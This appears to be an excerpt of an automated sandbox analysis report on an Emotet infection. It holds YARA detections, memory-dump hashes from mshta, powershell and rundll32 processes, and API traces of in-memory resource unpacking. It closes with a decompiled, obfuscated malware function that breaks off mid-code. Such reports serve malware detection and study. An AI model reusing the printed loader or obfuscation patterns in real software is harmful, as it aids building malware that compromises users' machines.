                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663778840.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664161641.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665168076.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665088679.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664763356.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    Reset < >
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412094692.00000000034D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_34d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a3f8300bee0b0820a3717d9b79a828f7b63684bb05a753cfd0ad7f3c46625445
                                                                                                                      • Instruction ID: 72c49df134117eb98bb493dc04b5b75b066f6c1665bf9da9474c80993d823b0d
                                                                                                                      • Opcode Fuzzy Hash: a3f8300bee0b0820a3717d9b79a828f7b63684bb05a753cfd0ad7f3c46625445
                                                                                                                      • Instruction Fuzzy Hash: 83D1F42061CA884FCB89DB2C8164621BBE1FF5D305B5949DFE49EDF396DA20CC81C799
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412094692.00000000034D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034D1000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_34d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a3f8300bee0b0820a3717d9b79a828f7b63684bb05a753cfd0ad7f3c46625445
                                                                                                                      • Instruction ID: 72c49df134117eb98bb493dc04b5b75b066f6c1665bf9da9474c80993d823b0d
                                                                                                                      • Opcode Fuzzy Hash: a3f8300bee0b0820a3717d9b79a828f7b63684bb05a753cfd0ad7f3c46625445
                                                                                                                      • Instruction Fuzzy Hash: 83D1F42061CA884FCB89DB2C8164621BBE1FF5D305B5949DFE49EDF396DA20CC81C799
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412094692.00000000034D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_34d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: eec4feec2330bb748a1b7e6a1517c80400dcaab79ef67a73f383a3aa8fc1d50b
                                                                                                                      • Instruction ID: c418a0d34ded132cd974b209c54d1d09d531845709ea79c828514583e22cca99
                                                                                                                      • Opcode Fuzzy Hash: eec4feec2330bb748a1b7e6a1517c80400dcaab79ef67a73f383a3aa8fc1d50b
                                                                                                                      • Instruction Fuzzy Hash: 3151E62071CA484FCB49EF1C8969A21B7E1FB5D300B5944EFE49ACB396DA24CC918796
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412094692.00000000034D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034D3000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_34d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: eec4feec2330bb748a1b7e6a1517c80400dcaab79ef67a73f383a3aa8fc1d50b
                                                                                                                      • Instruction ID: c418a0d34ded132cd974b209c54d1d09d531845709ea79c828514583e22cca99
                                                                                                                      • Opcode Fuzzy Hash: eec4feec2330bb748a1b7e6a1517c80400dcaab79ef67a73f383a3aa8fc1d50b
                                                                                                                      • Instruction Fuzzy Hash: 3151E62071CA484FCB49EF1C8969A21B7E1FB5D300B5944EFE49ACB396DA24CC918796
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412147022.00000000032D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_32d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction ID: 9233fc98d4036fa26f43f45b9f4d28f3f9811eff7fb2df6698a90dd38e5ce738
                                                                                                                      • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412147022.00000000032D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_32d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction ID: 9233fc98d4036fa26f43f45b9f4d28f3f9811eff7fb2df6698a90dd38e5ce738
                                                                                                                      • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412147022.00000000032D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_32d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction ID: 9233fc98d4036fa26f43f45b9f4d28f3f9811eff7fb2df6698a90dd38e5ce738
                                                                                                                      • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000003.412147022.00000000032D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_3_32d0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction ID: 9233fc98d4036fa26f43f45b9f4d28f3f9811eff7fb2df6698a90dd38e5ce738
                                                                                                                      • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.670562859.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_7ff00260000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 028f2bbf468e24f7d59ae89f571e44e34067635ce459d5912cc9809164f3a994
                                                                                                                      • Instruction ID: 7bb600172fb8a8fed12e76d7d56e03b16b9d9d8dcef7397a0dbf07cb2b414317
                                                                                                                      • Opcode Fuzzy Hash: 028f2bbf468e24f7d59ae89f571e44e34067635ce459d5912cc9809164f3a994
                                                                                                                      • Instruction Fuzzy Hash: 5A51AD21A0EBC60FDB53577858A97617FF0EF57204F1A40EBE488CB1E3D958985AC362
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.670562859.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_7ff00260000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2fb011615222e6a16c6f6bf6a8b44f59ea67582a42ffacd0e5d633ffbe3626f4
                                                                                                                      • Instruction ID: dbc328298a27624cc93ab4d08c1240dc3a231b24d745d3a12ca813d9fac77c8f
                                                                                                                      • Opcode Fuzzy Hash: 2fb011615222e6a16c6f6bf6a8b44f59ea67582a42ffacd0e5d633ffbe3626f4
                                                                                                                      • Instruction Fuzzy Hash: 8731106194F7C24FE713977858A96A17FB09F57210B0E04EBD088CF0E3E54C999AD362
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:19.9%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510D0,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$DASHBOARD$d$d$e$kre3.l$kxnY_L?zqlSEuu5S2VFol6SH1q?86X^fU74B$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-1239791992
                                                                                                                      • Opcode ID: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction ID: 6af05ad5a12929315e9cbc9f274344785a9cdc676413f0efaf09fcd5afa7189b
                                                                                                                      • Opcode Fuzzy Hash: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction Fuzzy Hash: 50613FB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E002C5CF9() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				signed int _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				signed int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed short* _t381;
                                                                                                                      				signed int _t393;
                                                                                                                      				signed int* _t395;
                                                                                                                      				signed int _t397;
                                                                                                                      				signed int _t398;
                                                                                                                      				signed int _t399;
                                                                                                                      				signed int _t400;
                                                                                                                      				signed int _t401;
                                                                                                                      				signed int _t407;
                                                                                                                      				signed int* _t428;
                                                                                                                      				void* _t429;
                                                                                                                      				signed short* _t435;
                                                                                                                      				signed int* _t436;
                                                                                                                      
                                                                                                                      				_t436 =  &_v1720;
                                                                                                                      				_v1644 = 0xf4f2e5;
                                                                                                                      				_v1644 = _v1644 << 6;
                                                                                                                      				_t397 = 0x4a;
                                                                                                                      				_v1644 = _v1644 / _t397;
                                                                                                                      				_v1644 = _v1644 ^ 0x00d3d8d4;
                                                                                                                      				_t395 = 0;
                                                                                                                      				_v1660 = 0x8afd01;
                                                                                                                      				_t429 = 0xc405385;
                                                                                                                      				_v1660 = _v1660 | 0xf6dee043;
                                                                                                                      				_v1660 = _v1660 ^ 0x10b315be;
                                                                                                                      				_t398 = 0x45;
                                                                                                                      				_v1660 = _v1660 / _t398;
                                                                                                                      				_v1660 = _v1660 ^ 0x035da190;
                                                                                                                      				_v1692 = 0xc25321;
                                                                                                                      				_v1692 = _v1692 | 0x3e4ae4fc;
                                                                                                                      				_t399 = 0x12;
                                                                                                                      				_v1692 = _v1692 * 0x47;
                                                                                                                      				_v1692 = _v1692 ^ 0x6159278c;
                                                                                                                      				_v1692 = _v1692 ^ 0x0b15fa01;
                                                                                                                      				_v1572 = 0xf82306;
                                                                                                                      				_v1572 = _v1572 | 0xe3d21ea1;
                                                                                                                      				_v1572 = _v1572 ^ 0xe3f9e5ad;
                                                                                                                      				_v1676 = 0x48d4cb;
                                                                                                                      				_v1676 = _v1676 << 4;
                                                                                                                      				_v1676 = _v1676 + 0xffff2f85;
                                                                                                                      				_v1676 = _v1676 + 0x9649;
                                                                                                                      				_v1676 = _v1676 ^ 0x048c097a;
                                                                                                                      				_v1584 = 0x8f76c2;
                                                                                                                      				_v1584 = _v1584 * 0x1d;
                                                                                                                      				_v1584 = _v1584 ^ 0x10457475;
                                                                                                                      				_v1596 = 0xadf885;
                                                                                                                      				_v1596 = _v1596 ^ 0xa065608b;
                                                                                                                      				_v1596 = _v1596 ^ 0xa0c2245b;
                                                                                                                      				_v1684 = 0xeb1e45;
                                                                                                                      				_v1684 = _v1684 + 0x7cda;
                                                                                                                      				_v1684 = _v1684 / _t399;
                                                                                                                      				_v1684 = _v1684 + 0xffffa266;
                                                                                                                      				_v1684 = _v1684 ^ 0x0000adef;
                                                                                                                      				_v1632 = 0x65fdd9;
                                                                                                                      				_v1632 = _v1632 + 0xb49;
                                                                                                                      				_v1632 = _v1632 + 0xfffffa9d;
                                                                                                                      				_v1632 = _v1632 ^ 0x00600454;
                                                                                                                      				_v1716 = 0x9184ac;
                                                                                                                      				_v1716 = _v1716 + 0xffff0d2e;
                                                                                                                      				_v1716 = _v1716 | 0x6897691f;
                                                                                                                      				_v1716 = _v1716 ^ 0x2cb5e262;
                                                                                                                      				_v1716 = _v1716 ^ 0x442095be;
                                                                                                                      				_v1576 = 0x53941d;
                                                                                                                      				_v1576 = _v1576 >> 2;
                                                                                                                      				_v1576 = _v1576 ^ 0x001525d4;
                                                                                                                      				_v1640 = 0xd435ce;
                                                                                                                      				_v1640 = _v1640 + 0xffff1394;
                                                                                                                      				_v1640 = _v1640 + 0xffff8dc5;
                                                                                                                      				_v1640 = _v1640 ^ 0x00d594ec;
                                                                                                                      				_v1708 = 0x173594;
                                                                                                                      				_v1708 = _v1708 ^ 0xe44a87fe;
                                                                                                                      				_v1708 = _v1708 << 7;
                                                                                                                      				_v1708 = _v1708 + 0xee7d;
                                                                                                                      				_v1708 = _v1708 ^ 0x2ed8d8cc;
                                                                                                                      				_v1700 = 0x94f2ae;
                                                                                                                      				_v1700 = _v1700 << 3;
                                                                                                                      				_v1700 = _v1700 << 6;
                                                                                                                      				_v1700 = _v1700 * 0x58;
                                                                                                                      				_v1700 = _v1700 ^ 0x66d58e50;
                                                                                                                      				_v1604 = 0xd84545;
                                                                                                                      				_v1604 = _v1604 | 0x98cc5948;
                                                                                                                      				_v1604 = _v1604 ^ 0x98d8436e;
                                                                                                                      				_v1668 = 0xea4a2f;
                                                                                                                      				_v1668 = _v1668 + 0xf7bd;
                                                                                                                      				_v1668 = _v1668 >> 7;
                                                                                                                      				_v1668 = _v1668 ^ 0xf693418b;
                                                                                                                      				_v1668 = _v1668 ^ 0xf6966bd3;
                                                                                                                      				_v1580 = 0xa2c8e;
                                                                                                                      				_v1580 = _v1580 + 0x2944;
                                                                                                                      				_v1580 = _v1580 ^ 0x00011cb1;
                                                                                                                      				_v1720 = 0x34ce8d;
                                                                                                                      				_v1720 = _v1720 | 0xf5ffffea;
                                                                                                                      				_v1720 = _v1720 >> 9;
                                                                                                                      				_v1720 = _v1720 ^ 0x00732654;
                                                                                                                      				_v1564 = 0x8a9f58;
                                                                                                                      				_v1564 = _v1564 + 0x7c05;
                                                                                                                      				_v1564 = _v1564 ^ 0x008f283e;
                                                                                                                      				_v1588 = 0xa4f562;
                                                                                                                      				_v1588 = _v1588 ^ 0x7b7d16a6;
                                                                                                                      				_v1588 = _v1588 ^ 0x7bd14885;
                                                                                                                      				_v1704 = 0xee28fd;
                                                                                                                      				_v1704 = _v1704 + 0xffffe5b2;
                                                                                                                      				_v1704 = _v1704 + 0xffff824b;
                                                                                                                      				_v1704 = _v1704 + 0x581e;
                                                                                                                      				_v1704 = _v1704 ^ 0x00e0f0ab;
                                                                                                                      				_v1712 = 0x91da58;
                                                                                                                      				_v1712 = _v1712 << 3;
                                                                                                                      				_v1712 = _v1712 << 0xd;
                                                                                                                      				_v1712 = _v1712 ^ 0x485191fe;
                                                                                                                      				_v1712 = _v1712 ^ 0x920a86f0;
                                                                                                                      				_v1624 = 0xf1deea;
                                                                                                                      				_t400 = 3;
                                                                                                                      				_v1624 = _v1624 / _t400;
                                                                                                                      				_t401 = 0x38;
                                                                                                                      				_v1624 = _v1624 * 0x4f;
                                                                                                                      				_v1624 = _v1624 ^ 0x18ea6ffc;
                                                                                                                      				_v1680 = 0x898c63;
                                                                                                                      				_v1680 = _v1680 * 0x6a;
                                                                                                                      				_v1680 = _v1680 * 0x38;
                                                                                                                      				_v1680 = _v1680 | 0xa82efbb3;
                                                                                                                      				_v1680 = _v1680 ^ 0xfd6ff7e4;
                                                                                                                      				_v1688 = 0xae251e;
                                                                                                                      				_v1688 = _v1688 << 3;
                                                                                                                      				_v1688 = _v1688 >> 0xf;
                                                                                                                      				_v1688 = _v1688 + 0xb719;
                                                                                                                      				_v1688 = _v1688 ^ 0x000aff47;
                                                                                                                      				_v1696 = 0x40e656;
                                                                                                                      				_v1696 = _v1696 | 0x21fda4e6;
                                                                                                                      				_v1696 = _v1696 + 0xca7;
                                                                                                                      				_v1696 = _v1696 << 0xa;
                                                                                                                      				_v1696 = _v1696 ^ 0xf7c0cc6c;
                                                                                                                      				_v1652 = 0x8f24c5;
                                                                                                                      				_v1652 = _v1652 << 0xb;
                                                                                                                      				_v1652 = _v1652 ^ 0x5fc65761;
                                                                                                                      				_v1652 = _v1652 ^ 0x26eed855;
                                                                                                                      				_v1600 = 0xeb50f4;
                                                                                                                      				_v1600 = _v1600 | 0xe5f9ced2;
                                                                                                                      				_v1600 = _v1600 ^ 0xe5f6f1e5;
                                                                                                                      				_v1672 = 0x2ac6e7;
                                                                                                                      				_v1672 = _v1672 / _t401;
                                                                                                                      				_v1672 = _v1672 + 0xffffde53;
                                                                                                                      				_v1672 = _v1672 + 0xffff94e0;
                                                                                                                      				_v1672 = _v1672 ^ 0x000ac548;
                                                                                                                      				_v1648 = 0x7ee323;
                                                                                                                      				_v1648 = _v1648 ^ 0xc4404dab;
                                                                                                                      				_v1648 = _v1648 << 2;
                                                                                                                      				_v1648 = _v1648 ^ 0x10f162dd;
                                                                                                                      				_v1568 = 0xe6f77a;
                                                                                                                      				_v1568 = _v1568 | 0x9ec6220d;
                                                                                                                      				_v1568 = _v1568 ^ 0x9ee5ede4;
                                                                                                                      				_v1616 = 0x905f8c;
                                                                                                                      				_v1616 = _v1616 + 0xffff5c7c;
                                                                                                                      				_v1616 = _v1616 >> 2;
                                                                                                                      				_v1616 = _v1616 ^ 0x0024325f;
                                                                                                                      				_v1592 = 0xde4b6;
                                                                                                                      				_v1592 = _v1592 * 0x3f;
                                                                                                                      				_v1592 = _v1592 ^ 0x03679ec9;
                                                                                                                      				_v1664 = 0xe0cee4;
                                                                                                                      				_v1664 = _v1664 >> 2;
                                                                                                                      				_v1664 = _v1664 * 0x13;
                                                                                                                      				_v1664 = _v1664 * 0x71;
                                                                                                                      				_v1664 = _v1664 ^ 0xd75e35a6;
                                                                                                                      				_v1636 = 0x97f252;
                                                                                                                      				_v1636 = _v1636 | 0xcb237ae2;
                                                                                                                      				_v1636 = _v1636 << 0xf;
                                                                                                                      				_v1636 = _v1636 ^ 0xfd7df459;
                                                                                                                      				_v1656 = 0xc6c2a7;
                                                                                                                      				_v1656 = _v1656 + 0x66f2;
                                                                                                                      				_v1656 = _v1656 >> 0x10;
                                                                                                                      				_v1656 = _v1656 | 0xc8135773;
                                                                                                                      				_v1656 = _v1656 ^ 0xc81a6fdc;
                                                                                                                      				_v1608 = 0xd95490;
                                                                                                                      				_v1608 = _v1608 + 0xffff3702;
                                                                                                                      				_v1608 = _v1608 ^ 0x00d9a4ac;
                                                                                                                      				_v1612 = 0x2487c2;
                                                                                                                      				_t435 = _v1608;
                                                                                                                      				_v1612 = _v1612 * 0x77;
                                                                                                                      				_v1612 = _v1612 << 4;
                                                                                                                      				_v1612 = _v1612 ^ 0x0fb1a599;
                                                                                                                      				_v1620 = 0xa1030c;
                                                                                                                      				_v1620 = _v1620 >> 3;
                                                                                                                      				_v1620 = _v1620 << 0x10;
                                                                                                                      				_v1620 = _v1620 ^ 0x20685173;
                                                                                                                      				_v1628 = 0xb9794c;
                                                                                                                      				_v1628 = _v1628 >> 0xa;
                                                                                                                      				_v1628 = _v1628 >> 4;
                                                                                                                      				_v1628 = _v1628 ^ 0x0003794a;
                                                                                                                      				while(_t429 != 0x35deb36) {
                                                                                                                      					if(_t429 == 0x3b58d4d) {
                                                                                                                      						_push(_v1628);
                                                                                                                      						_push(_v1620);
                                                                                                                      						_push(_v1612);
                                                                                                                      						_push(_t395);
                                                                                                                      						_push(_t395);
                                                                                                                      						_push(_v1608);
                                                                                                                      						_push(_t401);
                                                                                                                      						_push(_t395);
                                                                                                                      						E002B9700(_t435, _v1656, __eflags);
                                                                                                                      						_t395 = 1;
                                                                                                                      						__eflags = 1;
                                                                                                                      						L23:
                                                                                                                      						return _t395;
                                                                                                                      					}
                                                                                                                      					if(_t429 == 0x7ac99d0) {
                                                                                                                      						_t381 = _t435;
                                                                                                                      						__eflags =  *_t435 - _t395;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							L18:
                                                                                                                      							_t429 = 0xe3616dc;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      						do {
                                                                                                                      							L11:
                                                                                                                      							__eflags =  *_t381 - 0x2c;
                                                                                                                      							if( *_t381 != 0x2c) {
                                                                                                                      								goto L17;
                                                                                                                      							}
                                                                                                                      							_t428 =  &_v1560;
                                                                                                                      							while(1) {
                                                                                                                      								_t381 =  &(_t381[1]);
                                                                                                                      								_t407 =  *_t381 & 0x0000ffff;
                                                                                                                      								__eflags = _t407;
                                                                                                                      								if(_t407 == 0) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								__eflags = _t407 - 0x20;
                                                                                                                      								if(_t407 == 0x20) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								 *_t428 = _t407;
                                                                                                                      								_t428 =  &(_t428[0]);
                                                                                                                      								__eflags = _t428;
                                                                                                                      							}
                                                                                                                      							_t401 = 0;
                                                                                                                      							__eflags = 0;
                                                                                                                      							 *_t428 = 0;
                                                                                                                      							L17:
                                                                                                                      							_t381 =  &(_t381[1]);
                                                                                                                      							__eflags =  *_t381 - _t395;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						goto L18;
                                                                                                                      					}
                                                                                                                      					if(_t429 == 0x94e99a1) {
                                                                                                                      						_push(_t401);
                                                                                                                      						E002BEA7B( &_v520, _v1580, _v1644, _t401, _v1720, _v1564, _v1588); // executed
                                                                                                                      						E002D12A8(_t401, _v1704, __eflags, _v1712, _v1624,  &_v1040);
                                                                                                                      						_push(_v1652);
                                                                                                                      						_push(_v1696);
                                                                                                                      						_push(0x2b11dc);
